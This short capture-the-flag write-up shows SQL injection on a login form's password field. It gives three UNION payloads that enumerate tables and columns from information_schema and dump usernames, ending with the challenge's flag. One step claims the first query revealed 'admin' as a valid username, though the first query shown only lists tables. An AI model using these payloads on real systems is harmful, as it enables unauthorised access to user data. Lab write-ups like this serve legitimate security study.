The webpage is vulnerable to [SQLI](https://en.wikipedia.org/wiki/SQL_injection) on fields `username` and `password`

With `username=a&password=' UNION select table_name from information_schema.tables; -- '` we can get the table name: `user`

`username=a&password=' UNION select column_name from information_schema.columns where column_name != 'password'; -- '`

The column in which we are interested in is `username`

Since with the first SQLi we've found that admin is a valid username, we'll start by excluding it:
`username=a&password=' UNION select username from user where username not in ('admin'); -- '`

The result is: `flag{470bbbc0519e4bc6987bb00bef24a97a}`